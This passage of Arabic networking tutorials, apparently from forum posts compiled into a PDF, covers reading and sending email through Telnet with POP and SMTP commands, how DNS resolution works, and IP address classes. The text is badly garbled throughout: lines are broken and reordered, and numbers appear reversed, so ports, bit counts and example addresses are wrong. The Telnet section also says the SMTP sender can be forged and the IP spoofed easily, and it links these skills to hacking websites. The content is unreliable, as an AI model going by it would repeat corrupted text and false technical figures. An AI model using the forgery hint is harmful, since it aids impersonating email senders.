‫ومجالت خدماتاھا واذكر من ھذه الخدمات على سبیل المثال ‪ ::‬‬ ‫‪O‬‬ ‫‪Official Data‬‬ ‫التقارير الذكیة ( ‪ ( Reports Technical‬وقواعد البیانات الرسمیة (‬ ‫‪ , ( Bases‬وفھ ارس الكتب ( مثل مكتبة الكونغرس المريكیة ) وكذلك موقع وكالة‬ ‫ة‬ ‫‪ Nasa‬الذي يحتوي على ابحاث وتقارير عن علم الفضاء ‪ ....‬‬ ‫اشتراكا‪ ‬‬ ‫ا‬ ‫وكذلك ھ ناك العديد من الخدمات والمواقع ‪ ,‬وقد يتطلب استخدامھا‬ ‫مثل‪ ‬‬ ‫بھ ذه المواقع ‪ ,‬وقد توجد مواقع لعامة الزوار ولكن مع بعض التحفظات على ل‬ ‫‪ .....‬‬ ‫‪.‬‬ ‫ھذا النوع من الولوج واستخدام الموقع‬ ‫متممة‪ ‬‬ ‫ة‬ ‫وأود ان أذكر ھ نا اتماما للمقالة السابقة بعض البرامج التي تعتبر‬ ‫‪ 141‬‬ ‫للحصول على خدمة ‪ Telnet‬ومنھا ‪ :‬‬ ‫‪ -1‬برنامج ‪ Ewan‬وھو خاص بنظام ويندوزز‪ ‬‬ ‫ش‪ ‬‬ ‫‪ -2‬برنامج ‪ Ncsa‬وھو خاص بأنظمة ماكنتوش‬ ‫وھذان البرنامجان ھما الكثر انتشارا لسھولة التعامل معھما ‪ ..‬‬ ‫الستفادة من ال ‪ Telnet‬في تصفح البريد اللكتروني ‪ :‬‬ ‫البريد اللكتروني الذي يقدم خدمة ‪ Telnet‬يعتمد عادة على مزودين ‪ :‬‬ ‫‪ 52‬‬ ‫‪ -1‬مزود ارسال ‪ SMTP‬ويستخدم البورت ‪5‬‬ ‫‪ 011‬‬ ‫‪0‬‬ ‫‪ -2‬مزود استقبال ‪ POP‬ويستخدم البورت‬ ‫ت‪ ‬‬ ‫فإذا أرت ان تتصفح بريدك في ‪ Yahoo‬عن طريق ال ‪ Telnet‬فنفذ الخطوات‬


‫التالیة ‪ ::‬‬ ‫اكتب في ‪ Run‬من ‪ Start‬ما يلي ‪ :‬‬ ‫‪ POP.Mail.Yahoo.com 110 Telnet‬‬ ‫‪ ....‬‬ ‫طبعا على فرض انه لك حساب في الیاھو ‪.‬‬ ‫المستخدم‪ ‬‬ ‫م‬ ‫بعد ذلك ستظھ ر لك رسالة ترحیبیة ثم يطلب منك ادخال اسم‬ ‫فاكتب له كما يلي ‪ ::‬‬ ‫‪ ( your name ) User‬‬ ‫ثم اضغط ‪ ..... Enter‬بعد ذلك سیطلب منك ادخال كلمة المرور قم بكتابتھا ‪ :‬‬ ‫‪ (­­­ ) Pass‬‬ ‫‪ ..... Enter‬‬ ‫‪.‬‬ ‫ثم اضغط‬ ‫‪ ...‬‬ ‫وھ نا اذا كان الدخال صحیحا فسوف ينقلك الى صندوق البريد الخاص بك ‪.‬‬ ‫السابق‪ ‬‬ ‫ق‬ ‫يمكنك استخدام أوامر التلنت لتصفح بريدك وقد ذكرت في المقال‬ ‫معظمھا وأذكر منھا ‪ ::‬‬ ‫ل‪ ‬‬ ‫‪ List -1‬لستعراض الرسائل‬ ‫‪ Dele -2‬لحذف احدى الرسائل بعد تعیینھا‪ ‬‬ ‫‪ Retr -3‬لستقبال احدى الرسائل بعد تعیینھا‪ ‬‬ ‫‪ Mail From -4‬لرسال رسالة وتحديد المرسل لھا ( بعد كتابة ھذا المر يظھر‬ ‫لك عبارة‪ Sender ok:‬بعدھا اكتب المرسل الیه ‪ ))......‬‬ ‫‪ Rcpt To -5‬لتحديد المرسل الیه ( وبعد كتابة ھذا المر يظھر لك عبارة ‪ :‬‬ ‫‪ Recipiant ok‬بعدھا أعطه أمر ‪ Data‬ثم اكتب الرسالة التي تريد ‪ ......‬‬ ‫ملحظات ‪ ::‬‬ ‫‪ -1‬البروتوكول ‪ Smtp‬المعتمد في ارسال الرسائل ليتطلب أي توثیق ‪ ,‬وھذاا‪ ‬‬ ‫‪ 241‬‬ ‫أي‪ ‬‬ ‫يعني انه بإمكانك تزيیف الرسائل التي تريد ارسالھا بسھولة وذلك بكتابة ي‬ ‫ر‪ ‬‬ ‫اسم ( للمرسل ) بعد أمر ‪ Mail From‬ويمكنك أيضا تزوير ال ‪ IP‬الخاص وھو أمر‬ ‫‪ .....‬‬ ‫‪.‬‬ ‫في غاية السھولة‬ ‫ر‪ ‬‬ ‫‪ -2‬ال ‪ Telnet‬للسف ل يحتوي خاصیة تشفیر البیانات ‪ ,‬فإذا كتبت كلمة سر‬ ‫ان‪ ‬‬ ‫مثل فستظھر كما كتبتھا دون أي تورية لھا او تشفیر ‪ ....‬وھذه نقطة يجب ن‬ ‫‪ ...‬‬ ‫تنتبه لھا ‪.‬‬ ‫ة‪ ‬‬ ‫‪ -3‬في التثبیت الفتراضي لويندوز ‪ 0002‬قد تكون خدمة ال ‪ Telnet‬غیر مثبتة‬ ‫‪ Telnet Server Admin‬‬ ‫‪T‬‬ ‫لذلك فأنت بحاجة لتثبیتھ ا يدويا وذلك بتثبیت الداة‬ ‫الداة‪ ‬‬ ‫ة‬ ‫والتي تمكنك من ايقاف وتشغیل ھذه الخدمة في جھازك ‪ ,‬ولفتح ھذه‬ ‫اضغط على ‪ Telnet Administration‬في ‪ ) Administrative‬أدوات إدارية ) ‪ ....‬‬ ‫بعض خیارات ھذه الداة ‪ ::‬‬ ‫‪ service Start the‬لتشغیل التلنت ‪ ......‬‬ ‫‪ Stop the service‬ليقاف التلنت ‪ .......‬‬ ‫‪ current user List the‬يظھ ر المستخدمین المتصلین بخدمة التلنت ‪ ....‬‬ ‫أشیاء‪ ‬‬ ‫ء‬ ‫وأخیرا اذا كنت قد قرأت ھ ذين المقالین بشكل متقن فبإمكانك عمل‬ ‫المواقع‪ ‬‬ ‫ع‬ ‫كثیرة بواسطة ھ ذه الداة ( لمحت الى كثیر منھ ا ) لسیما في اختراق‬ ‫‪ ( ....‬أنواع منھا طبعا ) ‪ ....‬وھ ذا ل يحتاج منك ال الى التجربة والمتابعة ‪ ...‬ولبد‬ ‫د‬ ‫‪ ......‬‬ ‫‪.‬‬ ‫أنك في النھاية ستصل الى ما تريد‬ ‫حتى‪ ‬‬ ‫ولكن انتبه فھ ذه المور يجب ان تمارس بعناية فائقة بعد خبرة جیدة ى‬ ‫ليسبب لك أي ضرر ‪ ..‬‬ ‫‪ 341‬‬ ‫‪ DNS‬‬ ‫‪D‬‬ ‫ماھو‬ ‫‪ BURN_EG ACID‬‬ ‫‪B‬‬ ‫للكاتب‪:‬‬ ‫السلم علیكم و رحمه االله و بركاته ‪ ::‬‬ ‫تعالى‪ ‬‬ ‫ى‬ ‫ايش الخبار يا اصدقاء و زوار المنتدى اتمنى تكونو كلكو بخیر ان شاء االله‬ ‫االله‪ ‬‬ ‫ه‬ ‫و طبعا كما وعدتكم بعد العوده الحمد الله بالمواضیع القويه و المؤثره ان شاء‬ ‫و لكن قبل ان نبدأ دعونا نعقد اتفاق معا ‪ ::‬‬


‫بمعنى‪ ‬‬ ‫ى‬ ‫فلننسا كلمه ھ كر و لنبدأ فى تعلم الشیاء التى توصلنا لكلمه ھكر‬ ‫‪.....‬الخ‪ ‬‬ ‫خ‬ ‫الكلمه و طبعا الھكر لیس معنا تروجن ھورسس او سب سفن‬ ‫لغات‪ ‬‬ ‫الھكر الحقیقى ھ و تعلم نظم التشغیل مثل اللینكس و الیونكس و تعلم ت‬ ‫ى‪ ‬‬ ‫تصمیم المواقع بجانب بعض لغات البرمجه التى يكون اھمھا فى مجالنا ھى‬ ‫لغه السى ‪ C‬‬ ‫المفید‪ :‬‬ ‫‪:‬‬ ‫و الن دعونا من كل ھذه الخلبیط و لنبدأ التكلم فى‬ ‫ل‪ ‬‬ ‫نحن فى بعض الحیان نسمع عن اشیاء كثیره و لكن ل نعرف ما ھى و ل‬ ‫شئ‪ ‬‬ ‫نحاول ان نكتشف و نعرف ما ھى و فى ھذا الملف سوف نتكلم عن ئ‬ ‫يعرف‪ ‬‬ ‫ف‬ ‫نسمع عنه كثیرا و لكن معظمنا ل‬ ‫ما ھو ‪ ::‬‬ ‫‪ :DNS‬‬ ‫‪:‬‬ ‫و ھذا الشئ ھو ال‬ ‫و سوف نبدأ بالتحدث عن ھ ذا السم الذى يسمعه الكثیرين و لكن ل يعرفون ماا‬ ‫ھو ‪ ::‬‬ ‫نفسه‪ ‬‬ ‫ه‬ ‫و لنبدأ بالسؤال‬ ‫===========================================‬ ‫=======‪ ‬‬ ‫==============‪ ‬‬ ‫‪ ?DNS‬‬ ‫?‬ ‫ما ھو ال‬ ‫==============‪ ‬‬ ‫‪ DNS‬‬ ‫‪D‬‬ ‫اول ‪ DNS :‬ھو اختصار لكلمه ‪ . Domain Name System‬و يتصل سرفر ال‬ ‫عادتا على بورت ‪ 35‬مما يعنى انك اذا اردت التصال الى احد المواقع و‪ ‬‬ ‫ل‪ ‬‬ ‫استعملت ال ‪ DNS‬حقه فسوف تتصل‬ ‫‪ 441‬‬ ‫‪ translates alphabetical‬‬ ‫‪t‬‬ ‫به عن طريق البورت ‪ 35‬و سوف يترجم او يحول ال‬ ‫‪ IP‬‬ ‫‪ hostnames‬و يعنى اسم الموقع مثل ‪ WWW.BURN.COM :‬الى ‪I‬‬ ‫ه‪ ‬‬ ‫‪ ADRESSES‬مثل ‪ 1.0.0.721‬و العكس صحیح و عندما تتم العملیه‬ ‫‪ ):‬‬ ‫تتصل بالموقع مباشره )‬ ‫ن‪ ‬‬ ‫و عملیه التحويل ھذه تسمى ‪ address resolution‬اى تحويل او تحلیل عنوان‬ ‫ه‪ ‬‬ ‫الموقع الى ‪ IP‬او العكس لنستطیع التصال به‬ ‫د‪ ‬‬ ‫و قبل ظھور ال ‪ DNS‬كان اسم اخر لعملیه ال ‪. address resolution‬و لكن قد‬ ‫ن‪ ‬‬ ‫ظھر ال ‪ DNS‬لجعل توزيع الھوستس اسھ ل بكثیر من الماضى حیث انه من‬ ‫من‪ ‬‬ ‫السھ ل ان تتذكر اسم موقع معین تريده افضل من ان تتذكر اربعه خانات ن‬ ‫‪ . (IP‬‬ ‫الرقام ( ‪.‬‬ ‫و كان السم المستعمل ل ال ‪ address resolution‬قبل ال ‪ DNS‬كان يتكون من‬ ‫ن‬ ‫ملف اسمه ال ‪ HOST FILE‬و كان عباره عن اسماء الھوستس اى المواقع و‪ ‬‬ ‫‪S‬‬ ‫‪Stanford Research‬‬ ‫عنواوين ال ‪ IP‬الخاصه بھم و كان ھذا الملف تتولى رعايته‬ ‫‪ .(Institute's Network Information Center (SRI­NIC‬و كان على ھذاا‪ ‬‬ ‫ن‪ ‬‬ ‫الراعى ان يجدد ( ‪ (UPDATE‬الجدول ھذا حوالى كل اسبوع و يمده بالعنواوين‬ ‫ملفه‪ ‬‬ ‫ه‬ ‫الجديده و الرقام التى ظھ رت و على السیستم ادمین ان يجدد ھو الخر‬ ‫‪ .SRI­NIC‬‬ ‫‪.‬‬ ‫او عن طريق اتصال ال ‪ FTP‬بینه و بین الراعى اى‬ ‫بدأو‪ ‬‬ ‫و طبعا مع تطور النترنت الرھیب و السريع بدأ ھذا النظام فى الفشل و و‬ ‫بى‪ ‬‬ ‫يبحثون عن النظام المثل الذى يستطیع التحكم فى الھوست و الى ى‬ ‫معا فى وقت واحد و بسرعه و بترتب و دقه و طبعا ظھر ال ‪ DNS‬لیفعل ذلك‪ ..‬‬ ‫و ال ‪ DNS‬لیس له مركز اى ‪ decentralized‬اى انه لیس ھناك ماكینه اوو‪ ‬‬ ‫سیستم معین يتحكم فى كل ال ‪ DNS‬بل بالعكس فال ‪ DNS‬عباره عن داتا بیز‬ ‫ز‬ ‫‪ DNS‬‬ ‫‪D‬‬ ‫موزعه بشكل منظم و توجد على كذا سرفر مختلف و كل سرفر علیه‬ ‫معین‪ .‬‬ ‫‪.‬‬ ‫يعرف اين يبحث عندما يريد ان يحصل على معلومه معینه او ھوست‬ ‫ھذا بالنسبه لمعلومات عامه عن ال ‪ DNS‬و كیف كان النظام قبل اكتشافه و‪ ‬‬ ‫ھى ايضا نظره عامه عن حركه النترنت القديمه ‪ ..‬‬ ‫‪ :THE DNS SERVER‬‬


‫================‪ ‬‬ ‫او‪ ‬‬ ‫ال ‪ DNS SERVER‬ھو عباره عن كمبیوتر و يعمل عادتا على نظام ‪ UNIX‬و‬ ‫‪ Berkeley‬‬ ‫‪B‬‬ ‫النظم الشبیھ ه بالیونكس و يستخدم برنامج الیونكس ‪ BIND‬اى (‬ ‫ش‪ ‬‬ ‫‪ .(Internet Name Domain‬و يوجد ايضا برامج مثل ھذه للويندوز و الماكنتوش‬ ‫ايضا‪ ‬‬ ‫ا‬ ‫‪ . UNIX‬‬ ‫‪.‬‬ ‫اذا اراد احد استعمالھم ك ‪ DNS SERVER‬و لكن الكل يفضل ال‬ ‫‪ 541‬‬ ‫و يتكون برنامج ال ‪ DNS‬من جزئین ‪ :‬‬ ‫‪ (the name server itself (the daemon program that listens to port 35‬و‪ ‬‬ ‫‪ RESOLVER‬‬ ‫‪R‬‬ ‫الخر يسمى‬ ‫ه‪ ‬‬ ‫و ال ‪ NAME SERVER‬ھذا يستجیب الى متصفحك عندما تطلب معلومه معینه‬ ‫مثل‪ ‬‬ ‫فمثل عندما تفتح النترنت اكسبلورر و تكتب او تطلب منه موقه معین ل‬ ‫د‪ ‬‬ ‫‪ WWW.BURN.COM‬فسیسئل المتصفح اقرب ‪ DNS‬موجود له (و ھذا يعتمد‬ ‫على اتصالك بالشبكه و رقم الى بى الخاص بك) عن عنوان ال ‪ IP‬ل‪ ‬‬ ‫‪ WWW.BURN.COM‬‬ ‫لن المتصفح يحتاج ھذا ال ‪ IP‬لیجد السرفر الذى لديه ھذا الھوست اى ھذاا‪ ‬‬ ‫متصفحك‪ .‬‬ ‫‪.‬‬ ‫الموقع و يطلب محتويات الموقع من السرفر لیعرضھا لك فى‬ ‫ك‪ ‬‬ ‫و قبل ھذا سیسئل ال ‪ daemon program‬فى جداوله اى فى ذاكره متصفحك‬ ‫تتم‪ ‬‬ ‫عن الموقع الذى تطلبه فأذا لم يجده ينتقل الى ما سبق شرحه و ھكذا م‬ ‫العملیه‪ ):.‬‬ ‫)‬ ‫‪ :THE TREE INFORMATION‬‬ ‫======================‪ ‬‬ ‫و الن اصدقائى بعد ان اتقفنا على انك عندما تطلب رقم ‪ IP‬معین من المتصفح‬ ‫ح‬ ‫‪ DNS‬‬ ‫‪D‬‬ ‫حقك و ل يجده فى ال ‪ DNS‬المحلى اى الخاص بك سوف يسأل ال‬ ‫ى‪ ‬‬ ‫‪ SERVER‬العلى منه فى المستوى عنه لیجده و اذا لم يجده فى مستوى‬ ‫اعلى فینتقل للبحث فى مستوى اعلى و اعلى و ھ كذا يسیر البحث من القل‬ ‫ل‬ ‫‪ .DNS SERVERS‬‬ ‫‪.‬‬ ‫الى العلى فى مستويات ال‬ ‫لكن‪ ‬‬ ‫و طبعا نتیجه من ھ ذا التصال فنستنتج وجود شجره اتصال و معلومات و ن‬ ‫بالضبط‪ ‬‬ ‫ط‬ ‫كیف تعمل‬ ‫دعونا نأخذ مثال ‪ ::‬‬ ‫ك‪ ‬‬ ‫لو فرضنا ان ال ‪ ISP‬الخاص بك كان مثل ‪ isp.co.uk‬و ھذا يعتمد على اتصالك‬ ‫بالنترنت اى حسب الشركه و السرفر الذى تشبك علیه فمن الطبیعى طبعا ان‬ ‫ن‬ ‫ن‪ ‬‬ ‫يكون ال ‪ server's hostname ISP's DNS‬مثل ھذا ‪ dns.isp.co.uk‬و الن‬ ‫فالنفرض انك سألت ھذا ال ‪ DNS‬لیبحث لك عن ‪ IP‬الخاص ب‪ ‬‬ ‫ه‪ ‬‬ ‫‪ WWW.BURN.COM‬مثل فسیقوم ھذا ال ‪ dns.isp.co.uk‬بالبحث فى جداوله‬ ‫قلنا‪ ‬‬ ‫المحلیه المخذنه فى الذاكره عنده فیجدھا و اذا لم يجدھا فسینتقل كما ا‬ ‫ى‪ ‬‬ ‫الى مستوى اعلى من ال ‪ DNS SERVER‬لیبحث فیه و اذا لم يجده ايضا فى‬ ‫من‪ ‬‬ ‫المستوى العلى فعلیه ان يقوم بتغییر مكان البحث كلیا فمثل ن‬ ‫‪ school.edu.uk‬‬ ‫‪s‬‬ ‫‪ dns.isp.co.uk‬الى ‪ some­organization.org.uk‬او ‪,‬‬ ‫‪ university.ac.uk, england.gov.uk, airforce.mil.uk‬و الخ و ھناك امثله كثیراا‪ ‬‬ ‫‪ 641‬‬ ‫ه‪ ‬‬ ‫طبعا ‪ ):‬و كل شئ ينتھى ب ‪ UK‬و اذا لم يجده ايضا فى كل الماكن المتاح له‬ ‫البحث فیھا فسیرجع المتصفح الى اكبر ‪ DNS‬موجود على الشبكه و اسمه ال‬ ‫ل‬ ‫‪ ROOT‬فھو يحتوى على كل عناوين ال ‪ IP‬على كل للمواقع الموجوده على اى‬ ‫ى‬ ‫‪ .DOMAIN NAME‬‬ ‫‪ ?or fail "hang" When and why does DNS‬‬ ‫==============================‪ ‬‬ ‫و يمكن ايضا لل ‪ DNS‬ان يكون بطئ او سريع ‪.‬اذا كان ال ‪ ISP‬الخاص بك يحنوى‬ ‫ى‬ ‫على ال ‪ IP‬الذى طلبته فسوف يحتاج فقط الى اجزاء من الثانیه لیأتى به لك و‬ ‫ال‪ ‬‬ ‫يعرضه فى متصفحك‪ .‬اما اذا انتقل المتصفح للبحث فى مستوى اعلى من ل‬


‫‪ DNS‬فسوف يحتاج الى قلیل من الوقت يمتد حتى ‪ 51‬ثانیه ‪ .‬و فى حاله انه ل‬ ‫يجده سوف تأتیك رساله من متصفحك تقول ‪ address could not be found‬و‪ ‬‬ ‫ھذا يحدث نتیجه اعطاء المتصفح ‪ HOST‬او ‪ IP‬خطأ لیبحث عنه و بالتالى طبعاا‪ ‬‬ ‫متصفحك‪ ‬‬ ‫ك‬ ‫فھ و لیس موجود من الساس لیعرضه او نتیجه طول البحث فیقوم‬ ‫‪ . TIMED OUT‬‬ ‫‪.‬‬ ‫بقدان التصال مع ال ‪ DNS‬اى عملیه‬ ‫و فى ھذه الحاله نضغط فى المتصفح على ‪ REFRESH‬او‪ RELOAD‬طبعا حسب‬ ‫ب‬ ‫متصفحك‪ .‬‬ ‫‪.‬‬ ‫‪ 741‬‬ ‫‪ IP‬‬ ‫ماھو ‪I‬‬ ‫القطان‪ ‬‬ ‫ن‬ ‫للكاتب‪:‬محمد‬ ‫‪ ...‬‬ ‫السلم علیكم ‪.‬‬ ‫تكلمنا في المنتدى كثیرا حول بروتوكول ‪ TCP/IP‬وذلك في عدة مواضیع نشرھا‬ ‫‪ ...‬‬ ‫الخ عبد الحفیظ ‪.‬‬ ‫‪ IP‬‬ ‫والن سوف نشرح مفھوم عناوين الـ ‪I‬‬ ‫بقیة‪ ‬‬ ‫ھذا عبارة عن جزء من بحث كتبته لحدى المجلت العربیة وسوف نكمل ة‬ ‫الكلم عن ‪ TCP/IP‬في مواضیع قادمة ان شاء االله ‪ ...‬‬ ‫ید‪ ‬‬ ‫تمھ د‬ ‫ی يعرف باسم عنوان ‪.IP‬كما يجب‬ ‫ب‬ ‫كل محطة ‪ TCP/IP‬يجب أن تحمل رق ً‬ ‫م منطق ً‬ ‫اا‪ ‬‬ ‫ا‬ ‫ا‪ ‬‬ ‫ض أن تكون عناوين ‪ IP‬وحیدة لكل محطة أو شبكة مستخدمة لبروتوكول‬ ‫أي ً‬ ‫‪ TCP/IP‬من أجل التصال‪ ..‬‬ ‫ي ر‪ ‬‬ ‫ُع ّف عنوان ‪ IP‬مكان توضع المحطة ضمن الشبكة بنفس الطريقة التي يتم‬ ‫لتحقیق‪ ‬‬ ‫ق‬ ‫التعريف بھ ا عن عنوان منزل داخل مدينة ما باستخدام اسم الشارع‪.‬‬ ‫ن وحید ً وذو بنیة‬ ‫ة‬ ‫ذلك‪ ،‬يجب أن تمتلك كل محطة من محطات الكرة الرضیة عنوا ً‬ ‫اا‪ ‬‬ ‫ا‬ ‫متماثلة‪ .‬‬ ‫‪.‬‬ ‫ل‪ ‬‬ ‫يسمح عنوان ‪ IP‬بالدللة على رقم الشبكة ‪ Network ID‬ورقم المحطة داخل‬ ‫ة‪ ‬‬ ‫الشبكة ‪ .Host ID‬يدل رقم الشبكة على النظام المتوضع على نفس الشبكة‬ ‫أن‪ ‬‬ ‫الفیزيائیة‪ .‬يجب على جمیع المحطات المتوضعة على شبكة فیزيائیة واحدة ن‬ ‫تمتلك نفس رقم الشبكة‪ .‬كما يجب أن يكون رقم الشبكة وحید ً بین أرقام بقیة‬ ‫ة‬ ‫اا‪ ‬‬ ‫الشبكات‪ .‬‬ ‫‪.‬‬ ‫ي‪ ‬‬ ‫أما رقم المحطة ‪ Host ID‬فیع ّف محطة عمل أو مخدم أو مسیر ‪ Router‬أو أي‬ ‫رر‪ ‬‬ ‫اا‪ ‬‬ ‫جھاز يستخدم بروتوكولت ‪ .TCP/IP‬يجب أن يكون عنوان كل محطة وحید ً‪ ‬‬ ‫للشبكة‪ .‬‬ ‫‪.‬‬ ‫بالنسبة‬ ‫المحطة‪ ‬‬ ‫ة‬ ‫رقم الشبكة ورقم‬ ‫ة‪ ‬‬ ‫يحوي عنوان ‪ IP‬على ‪ 23‬بت ويتألف من أربعة حقول ذات ثمانیة بتات مفصولة‬ ‫ه‪ ‬‬ ‫م عشريً محصوًر بین ‪ ، 552-0‬تدعى ھذه‬ ‫بوساطة نقاط‪ .‬تمثل كل ثمانیة رق ً‬ ‫اا‪ ‬‬ ‫ا‬ ‫ا‬ ‫البنیة بالتمثیل العشري المنقط ‪ .dotted decimal notation‬يمثل العنوان التالي‬ ‫ي‬ ‫التمثیل‪ :‬‬ ‫‪:‬‬ ‫مثا ً على ھذا‬ ‫ل‪ ‬‬ ‫ل‬ ‫‪ 841‬‬ ‫‪ Address Classes‬‬ ‫‪A‬‬ ‫صفوف العناوين‬ ‫للشبكات‪ .‬‬ ‫‪.‬‬ ‫عرفت جماعة النترنت خمسة صفوف للعنونة لتلئم أحجام مختلفة‬ ‫لعنونة‪ ‬‬ ‫ة‬ ‫يحدد كل صف البتات المستخدمة لعنونة الشبكة والبتات المستخدمة‬ ‫اا‪ ‬‬ ‫ض‪ ‬‬ ‫ض‬ ‫المحطات‪ .‬لذلك يحدد كل صف عدد الشبكات الممكن عنونتھا كما يحدد أي ً‬


‫شبكة‪ .‬‬ ‫‪.‬‬ ‫عدد المحطات القابلة للعنونة ضمن كل‬ ‫يبین الجدول التالي المعرفات المستخدمة للشبكة وللمحطات ضمن صفوف ‪A,‬‬ ‫‪ :B, and C‬‬ ‫الصف ‪ A‬‬ ‫ن‪ ‬‬ ‫ُنسب عناوين الصف ‪ A‬إلى الشبكات التي تحتوي على أعداد ً كبیرة من‬ ‫ت‪ ‬‬ ‫ت‬ ‫ا‬ ‫ا‬ ‫المحطات‪ .‬يكون البت ذو الترتیب العلى من عنوان ما يتبع إلى الصف ‪ A‬مساويً‬ ‫للشبكة‪ ‬‬ ‫ة‬ ‫إلى الصفر‪ .‬كما تستخدم السبعة بتات التالیة من أول بايت كمعرف‬ ‫ل‪ ‬‬ ‫‪ .Network ID‬أما البتات الباقیة (‪ 42‬بت) فتستخدم لعنونة المحطات داخل‬ ‫ملیون‪ ‬‬ ‫ن‬ ‫الشبكة‪ .‬ھ ذا يسمح بعنونة ‪ 621‬شبكة (من ‪ 1‬إلى ‪ )621‬وحوالي ‪71‬‬ ‫شبكة‪ .‬‬ ‫‪.‬‬ ‫محطة ضمن كل‬ ‫الصف ‪ B‬‬ ‫ُنسب عناوين الصف ‪ B‬إلى الشبكات متوسطة الحجم‪ُ .‬قسم البتات كما يلي‪::‬‬ ‫ت‪ ‬‬ ‫ت‬ ‫ت‬ ‫ف‪ ‬‬ ‫‪ -1‬البتان ذو الترتیب العلى يأخذان القیمة ‪ 01‬لتحید نوع الصف‬ ‫ة‪ ‬‬ ‫‪ -2‬تستخدم الربعة عشرة بت التالیة كمعرف للشبكة‬ ‫ة‪ ‬‬ ‫‪ -3‬تستخدم الستة عشرة بت الخیرة لعنونة المحطات ضمن كل شبكة‬ ‫ھذا يسمح بعنونة ‪ 483.61‬شبكة و ‪ 435.56‬محطة ضمن كل شبكة‪ ..‬‬ ‫الصف ‪ C‬‬ ‫ت‪ ‬‬ ‫ُنسب عناوين الصف ‪ C‬إلى الشبكات المحلیة الصغیرة ‪ .LANs‬وتوزع البتات كما‬ ‫يلي‪ :‬‬ ‫‪:‬‬ ‫‪ 011‬‬ ‫‪0‬‬ ‫‪ -1‬تأخذ البتات الثلث الول القیمة‬ ‫ة‪ ‬‬ ‫‪ -2‬تستخدم البتات الحدى والعشرين التالیة كمعرف للشبكة‬ ‫ة‪ ‬‬ ‫‪ -3‬تستخدم البتات الثمانیة الباقیة لعنونة المحطات ضمن كل شبكة‬ ‫ب و ‪ 452‬محطة ضمن كل شبكة‪ ..‬‬ ‫ھذا يسمح بعنونة ‪ 2‬ملیون شبكة تقري ً‬ ‫اا‪ ‬‬ ‫الصف ‪ D‬‬ ‫ة‪ ‬‬ ‫تستخدم عناوين الصف ‪ D‬للمجموعات متعددة النقاط‪ .‬يمكن للمجموعة متعددة‬ ‫كما‪ ‬‬ ‫النقاط أن تحوي على محطة أو أكثر أو حتى أن تكون فارغة‪ .‬توزع البتات ا‬ ‫‪ 941‬‬ ‫يلي‪ :‬‬ ‫‪:‬‬ ‫‪ 0111‬‬ ‫‪0‬‬ ‫‪ -1‬تأخذ البتات الربعة الول القیمة‬ ‫ن‪ ‬‬ ‫‪ -2‬تستخدم الربعة والعشرين بت الباقیة لعنونة المجموعات والتي يمكن‬ ‫ذا‪ ‬‬ ‫للمستخدم النضمام إلیھ ا‪ .‬ل توجد بتات خاصة بالشبكة أو بالمحطة ضمن ھ ا‬ ‫كل‪ ‬‬ ‫الصف من العناوين‪ .‬تمرر الطرود إلى مجموعة جزئیة من المحطات ضمن ل‬ ‫شبكة‪ .‬فقط المحطات المسجلة ضمن مجموعة متعددة النقاط تستقبل الطرد‪..‬‬ ‫الصف ‪ E‬‬ ‫تستخدم عناوين الصف ‪ E‬كعناوين تجريبیة غیر متوافرة للستخدام العام‪ .‬كماا‪ ‬‬ ‫أنھ ا محجوزة لستخدامات مستقبلیة‪ .‬تبدأ ھذه العناوين بالقیمة ‪ .1111‬‬ ‫العناوين‪ ‬‬ ‫ن‬ ‫ملخص عن صفوف‬ ‫نلحظ أن المجموع العام للمحطات القابلة للعنونة ضمن كافة الصفوف السابقة‬ ‫ة‬ ‫محطة‪ .‬‬ ‫‪.‬‬ ‫تصل إلى ‪826.413.027.3‬‬ ‫العنونة‪ ‬‬ ‫ة‬ ‫إرشادات حول‬ ‫والمحطات‪ :‬‬ ‫‪:‬‬ ‫يجب النتباه إلى الرشادات التالیة عند نسب معرفات الشبكات‬ ‫ة‪ ‬‬ ‫‪ -1‬ل يمكن لرقم الشبكة أن يأخذ القیمة ‪ - 721‬تحجز ھذه القیمة إلى وظیفة‬ ‫‪ loopback‬‬ ‫‪l‬‬ ‫الفحص الذاتي لبطاقة الشبكة‬ ‫ه‪ ‬‬ ‫‪ -2‬ل يمكن لمعرفات الشبكة والمحطة أن تأخذ جمیعً القیمة ‪ -‬تحجز ھذه‬ ‫اا‪ ‬‬ ‫ة‪ ‬‬ ‫القیمة كتعمیم ‪ broadcast‬على الشبكة المحلیة‬


‫‪ -3‬ل يمكن لمعرفات الشبكة والمحطات أن تأخذ جمیعً القیمة صفر‪ .‬تحجز ھذه‬ ‫ه‬ ‫اا‪ ‬‬ ‫القیمة كعنوان للشبكة ذاتھاا‪ ‬‬ ‫‪ -4‬يجب أن يكون عنوان المحطة وحید ً بالنسبة لعنوان الشبكة‪ ..‬‬ ‫اا‪ ‬‬ ‫‪ Network ID‬‬ ‫‪N‬‬ ‫َسب ُعرفات الشبكة‬ ‫ن‪ ‬‬ ‫ن‬ ‫م‬ ‫الموجودة‪ ‬‬ ‫ة‬ ‫يحدد "معرف الشبكة" المحط َ المستخدمة لبروتوكولت ‪TCP/IP‬‬ ‫ة‪ ‬‬ ‫ة‬ ‫على‪ ‬‬ ‫على نفس الشبكة الفیزيائیة‪ .‬يجب على جمیع المحطات المرتبطة ى‬ ‫تستطیع‪ ‬‬ ‫ع‬ ‫شبكة فیزيائیة واحدة أن تأخذ نفس عنوان (معرف) الشبكة حتى‬ ‫ا‪ .‬‬ ‫التصال مع بعضھ ‪.‬‬ ‫مختلفة‪ ‬‬ ‫ة‬ ‫كما يجب أن تأخذ جمیع المحطات بما فیھ ا بوابات المسیرات معرفات‬ ‫ا‪ .‬‬ ‫عن بعضھ ‪.‬‬ ‫‪ IP‬‬ ‫يكون عنوان ‪ IP‬لبوابة المسیر المربوطة إلى الشبكة ھو نفسه عنوان ‪I‬‬ ‫‪ 051‬‬ ‫م‪ ‬‬ ‫المعرف كعبارة افتراضیة ‪ default gateway‬لدى أي محطة عمل عندما يتم‬ ‫ة‪ ‬‬ ‫إعداد ‪ TCP/IP‬لديھ ا‪ .‬فیمكننا مث ً تحديد للحاسب الموجود على الشبكة‬ ‫ل‪ ‬‬ ‫ل‬ ‫‪1 Subnet‬ذو العنوان ‪ 72.0.0.421‬عنوان العبارة الفتراضیة ‪ .1.0.0.421‬‬ ‫للمحطات‪ ‬‬ ‫ت‬ ‫المعرفات المقبولة‬ ‫شبكة‪ ‬‬ ‫ة‬ ‫بین الجدول التالي المجالت المقبولة لمعرفات المحطات بالنسبة لي‬ ‫خاصة‪ :‬‬ ‫‪:‬‬ ‫المحطات‪ ‬‬ ‫ت‬ ‫مقترحات حول تعیین معرفات‬ ‫برقم‪ ‬‬ ‫م‬ 